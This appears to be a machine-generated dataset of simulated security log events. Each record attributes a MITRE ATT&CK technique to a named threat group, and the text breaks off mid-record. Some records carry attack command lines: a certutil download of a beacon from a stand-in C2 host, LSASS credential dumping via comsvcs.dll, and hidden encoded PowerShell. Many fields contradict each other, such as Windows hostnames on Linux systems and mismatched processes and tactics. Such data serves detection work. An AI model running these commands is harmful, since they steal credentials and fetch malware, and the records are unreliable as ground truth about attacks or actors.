{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Lateral Movement","Exfiltration"],"technique_id":"T1484.001"},"event_id":"evt_apt41_20250115T083647000Z_0000743","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.192.44.206","name":"WIN-FIN-SRV-Y4T7HFIAQL","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"743APT41T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.34.62.145","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-06-01T00:57:36.000Z","user":{"name":"svc_cnfe83o7o93g","sid":"S-1-5-21-182725403-543118876-4899"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access","Execution","Command and Control"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20260909T133724000Z_0000745","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.206.49.152","name":"AZURE-VM-XSWWES1A2K","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"745Volt TyphoonT1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.193.168.252","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-02-25T13:20:46.000Z","user":{"name":"arn:aws:iam::kxd5yk4128xu","sid":"S-1-5-21-288965741-457433838-2748"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Initial Access","Persistence","Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20250430T100557000Z_0000747","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.176.34.200","name":"APP-WEB-HM7KG8PW4G","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"747FIN7T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.16.199.192","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-06-16T20:16:26.000Z","user":{"name":"i-omqgluk16qse","sid":"S-1-5-21-689024786-375425562-4975"}}
|
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion","Privilege Escalation","Persistence"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20260212T072242000Z_0000749","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.31.33.175","name":"WIN-FIN-SRV-ZLY2GX52II","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"749Mustang PandaT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.112.85.8","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-02-21T02:00:32.000Z","user":{"name":"azuread\\8b658r36is5g","sid":"S-1-5-21-247817107-400543178-6674"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Initial Access","Credential Access"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20250505T222553000Z_0000751","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.126.10.147","name":"APP-WEB-GFU3RUKUQS","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"751FIN7T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.86.223.214","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2842 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-22T20:22:56.000Z","user":{"name":"azuread\\8nw9qw2mi2p6","sid":"S-1-5-21-263610016-364753312-6831"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Privilege Escalation","Credential Access"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260926T213800000Z_0000753","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.71.186.62","name":"DB-ORACLE-RPR37R2MRI","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"753Volt TyphoonT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.100.150.84","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 940 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-10-15T13:51:30.000Z","user":{"name":"i-b5k536rravk0","sid":"S-1-5-21-731682316-947421693-7239"}}
|
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Execution"],"technique_id":"T1531"},"event_id":"evt_apt29_20260708T102351000Z_0000755","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.29.80.110","name":"IAM-ROLE-O2AG4BOQUW","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"755APT29T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.60.153.211","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-10-23T03:00:42.000Z","user":{"name":"i-69prr4sbceed","sid":"S-1-5-21-147513377-709990529-2885"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Impact","Defense Evasion"],"technique_id":"T1566.001"},"event_id":"evt_unc4841_20251213T135633000Z_0000757","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.57.97.219","name":"DB-ORACLE-B7X9RFMEHF","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"757UNC4841T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.116.192.56","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-20T13:18:18.000Z","user":{"name":"arn:aws:iam::ghxmfdj3ekiw","sid":"S-1-5-21-519390033-387041330-6105"}}
|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Credential Access"],"technique_id":"T1531"},"event_id":"evt_apt41_20250414T011030000Z_0000759","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.138.15.199","name":"AZURE-VM-LJU6SGM4FW","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"759APT41T1531"},"network":{"domain":"github.com","dst_ip":"1.168.160.111","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 994 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-10T04:45:18.000Z","user":{"name":"azuread\\j5phods9uyeg","sid":"S-1-5-21-215534344-818201413-2409"}}
|
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Exfiltration","Collection"],"technique_id":"T1531"},"event_id":"evt_apt41_20251002T013315000Z_0000761","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.150.232.141","name":"WIN-FIN-SRV-RQJC5G23MC","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"761APT41T1531"},"network":{"domain":"github.com","dst_ip":"1.96.148.46","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-02-15T20:25:51.000Z","user":{"name":"svc_6cgjg0z2xhfd","sid":"S-1-5-21-486203146-261478177-3859"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Collection"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250806T163030000Z_0000763","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.46.243.92","name":"DB-ORACLE-P9VCYF1Q7V","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"763Lapsus$T1098.004"},"network":{"domain":"github.com","dst_ip":"1.78.121.2","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-02-23T17:56:27.000Z","user":{"name":"arn:aws:iam::vwnnfjygw38n","sid":"S-1-5-21-343846166-115956581-9869"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement","Command and Control","Execution"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20260312T101737000Z_0000765","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.20.189.2","name":"DB-ORACLE-CIHZXKFKC1","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"765Scattered SpiderT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.71.25.173","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3606 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-05-14T15:10:51.000Z","user":{"name":"arn:aws:iam::60abrn1qqks0","sid":"S-1-5-21-473783351-127767632-9964"}}
|
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Impact","Initial Access","Discovery"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20260810T182359000Z_0000767","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.105.15.30","name":"AZURE-VM-STROXWTRZE","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"767Mustang PandaT1098.004"},"network":{"domain":"github.com","dst_ip":"1.88.64.140","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 630 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-03-14T17:19:53.000Z","user":{"name":"azuread\\hko3k98o1ezd","sid":"S-1-5-21-893984404-897496271-9775"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250708T111124000Z_0000769","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.207.231.19","name":"WIN-FIN-SRV-E0YPZLI1QI","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"769Scattered SpiderT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.99.154.166","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-01-10T13:55:07.000Z","user":{"name":"svc_ph28rzrx23rw","sid":"S-1-5-21-428613746-805181653-1553"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Execution"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20261017T165818000Z_0000771","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.130.55.163","name":"WIN-FIN-SRV-Z5YSI1ZQHP","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"771Scattered SpiderT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.48.202.144","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-07-24T05:41:14.000Z","user":{"name":"i-ida8mrn8jaga","sid":"S-1-5-21-257832970-269617704-9228"}}
|
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20250809T033110000Z_0000773","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.175.39.103","name":"IAM-ROLE-IYBDZJ503H","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"773Volt TyphoonT1098.004"},"network":{"domain":"github.com","dst_ip":"1.154.97.213","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-02-18T13:02:07.000Z","user":{"name":"arn:aws:iam::xrn5kfhuixds","sid":"S-1-5-21-253096631-730704263-8095"}}
|
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Persistence","Reconnaissance"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20250519T212527000Z_0000775","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.25.167.16","name":"WIN-FIN-SRV-8GWUKZAD5E","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"775APT29T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.8.146.65","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2297 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-09-29T13:52:52.000Z","user":{"name":"arn:aws:iam::hgz4ejsv4qf8","sid":"S-1-5-21-776620957-531916859-7464"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Execution","Collection"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20250506T203758000Z_0000777","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.150.41.28","name":"DB-ORACLE-4I4J90M5F4","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"777UNC4841T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.107.168.130","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-06T13:43:55.000Z","user":{"name":"svc_oigcfmoefgao","sid":"S-1-5-21-454681619-118504314-7235"}}
|
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Initial Access"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20260325T170654000Z_0000779","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.133.212.110","name":"APP-WEB-375TA2OG1A","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"779Mustang PandaT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.79.53.109","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-05-12T08:31:50.000Z","user":{"name":"azuread\\d149n3czkyhl","sid":"S-1-5-21-476814734-379323860-6815"}}
|
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Persistence","Collection","Impact"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20250202T230450000Z_0000781","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.225.148.166","name":"AZURE-VM-X14M4Z098T","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"781Lapsus$T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.52.97.161","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-08-08T21:12:06.000Z","user":{"name":"i-1of003os9pnk","sid":"S-1-5-21-117230222-904455891-7483"}}
|
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Command and Control"],"technique_id":"T1546.003"},"event_id":"evt_fin7_20261016T120028000Z_0000783","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.153.117.227","name":"IAM-ROLE-LS5XY5XY3L","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"783FIN7T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.104.234.107","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-08-12T23:00:58.000Z","user":{"name":"CORP\\3q9op8wttwm3","sid":"S-1-5-21-598014452-762909621-1738"}}
|
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Discovery"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20260626T123707000Z_0000785","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.33.113.21","name":"DB-ORACLE-29IP05V707","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"785UNC4841T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.188.12.223","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-03T21:09:44.000Z","user":{"name":"i-vo8nplbz91bd","sid":"S-1-5-21-945352498-867900194-7734"}}
|
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access","Lateral Movement","Exfiltration"],"technique_id":"T1098.004"},"event_id":"evt_apt29_20260711T021325000Z_0000787","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.73.156.133","name":"IAM-ROLE-CHQIFV43CG","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"787APT29T1098.004"},"network":{"domain":"github.com","dst_ip":"1.114.238.53","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1556 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-19T21:10:31.000Z","user":{"name":"arn:aws:iam::xnm2v7fgantr","sid":"S-1-5-21-799918579-786751426-4070"}}
|
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Reconnaissance","Privilege Escalation","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20250112T201445000Z_0000789","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.71.52.33","name":"EC2-INST-WSCA71NKAG","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"789Scattered SpiderT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.72.115.120","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Sysmon 